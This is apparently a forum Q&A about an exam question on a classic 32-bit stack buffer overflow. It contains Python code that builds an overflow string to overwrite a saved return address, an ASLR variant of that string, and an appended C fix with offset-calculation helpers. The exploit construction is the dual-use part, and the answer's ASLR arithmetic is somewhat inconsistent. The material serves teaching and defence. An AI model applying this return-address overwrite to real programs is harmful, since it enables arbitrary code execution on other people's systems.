I am reviewing for my exams next week, and I have come across a past question.

#include <string.h>

void func(char *arg)
{
    char buf[32];
    strcpy(buf, arg);   /* unbounded copy: arg longer than 31 bytes overflows buf */
}

Suppose:

  • No defenses at all
  • buf begins at 0xbffebfb0
  • (gdb) x/2wx $ebp 0xbffebfd8: 0xbffec068 0x08048fe1

a) You want to run a payload that is 24 bytes long; what bytes should be copied into the buffer for an exploit? (I would want to fill in '\x90' for the 24 bytes.)

b) If ASLR is enabled, which offsets the stack by 0-15 bytes each time it runs, what payload (described as a Python print statement) will always get the shellcode above to execute? Or why is such a payload impossible?

Matt Dathew

1 Answer

a) The output from gdb is not consistent with normal compilation of this function: there should be 32 bytes difference between the top of the buffer and ebp. However, 0xbffebfd8 - 0xbffebfb0 is 0x28 (40 bytes). I'm going to assume this is incorrect, since the only local variable is buf.

import struct

# Python 2: str and the bytes returned by struct.pack() concatenate directly.
def hack(payload='\x90'*24):
    filler = 'A'*(32 - len(payload)) # for rest of buffer
    frame_ptr = struct.pack("<I", 0x42424242) # overwrites the saved ebp (value does not matter)
    ret = struct.pack("<I", 0xbffebfb0) # jump to top of buffer
    return payload + filler + frame_ptr + ret + '\0'

b) If the stack value changes by 0-15 bytes each time, you would need to insert a 15-byte NOP sled.

32 (buffer length) + 4 (saved frame pointer) = 36; 36 - 15 = 21 bytes

This is not sufficient room to fit the 24-byte payload. If the above strange gdb output is correct, then it is enough room.

import struct

payload = '\x90'*24 # the 24-byte payload from part (a)

print ("\x90"*15 + # nop sled
       payload +
       'A'*(40 - len(payload) - 15) + # filler
       struct.pack("<I", 0x42424242) + # saved frame pointer
       struct.pack("<I", 0xbffebfb0) + # saved return address
       '\0' )
Jesse Spears
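As an added example (not part of the question or the answer above), here is the fix a reviewer would want for func() together with the answer's layout arithmetic written out in C: a bounded replacement that can never write past buf, and two helpers for crash triage that compute where the saved return address sits relative to buf. The names func_safe, ret_addr_offset and overwrites_ret are hypothetical; the sample inputs are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 32  /* same size as buf[32] in the question's func() */

/* Bounded replacement for func(): rejects any arg that, terminator
 * included, does not fit in buf, so the copy can never run past buf
 * into the saved frame pointer and return address.
 * Returns 0 on success, -1 if arg was rejected. */
int func_safe(const char *arg)
{
    char buf[BUF_SIZE];
    /* Look for the NUL within the first BUF_SIZE bytes only; strlen()
     * would read arbitrarily far on unterminated input. */
    const char *end = memchr(arg, '\0', BUF_SIZE);
    if (end == NULL)
        return -1;                    /* no room for data plus NUL */
    memcpy(buf, arg, (size_t)(end - arg) + 1);  /* copies the NUL too */
    return 0;
}

/* The answer's layout arithmetic: strcpy() starts writing at buf_addr,
 * the saved ebp sits at ebp_addr and the return address 4 bytes above
 * it. Returns the offset of the return address from the start of buf
 * (36 for the normal 32-byte gap, 44 for the 0x28 gap gdb showed). */
size_t ret_addr_offset(unsigned long buf_addr, unsigned long ebp_addr)
{
    return (size_t)(ebp_addr - buf_addr) + 4;
}

/* Crash triage: does an input of input_len bytes (strcpy() writes one
 * more for the NUL) overwrite at least one byte of the return address? */
int overwrites_ret(size_t input_len, unsigned long buf_addr,
                   unsigned long ebp_addr)
{
    return input_len + 1 > ret_addr_offset(buf_addr, ebp_addr);
}

int main(void)
{
    const char *ok = "short input";                              /* constructed */
    const char *bad = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  /* 40 x 'A' */
    printf("func_safe(ok)  = %d\n", func_safe(ok));   /* 0: fits */
    printf("func_safe(bad) = %d\n", func_safe(bad));  /* -1: rejected */
    printf("ret offset, normal layout: %zu\n",
           ret_addr_offset(0xbffebfb0UL, 0xbffebfd0UL));
    printf("40-byte input clobbers ret (gdb layout)? %d\n",
           overwrites_ret(40, 0xbffebfb0UL, 0xbffebfd8UL));
    return 0;
}
```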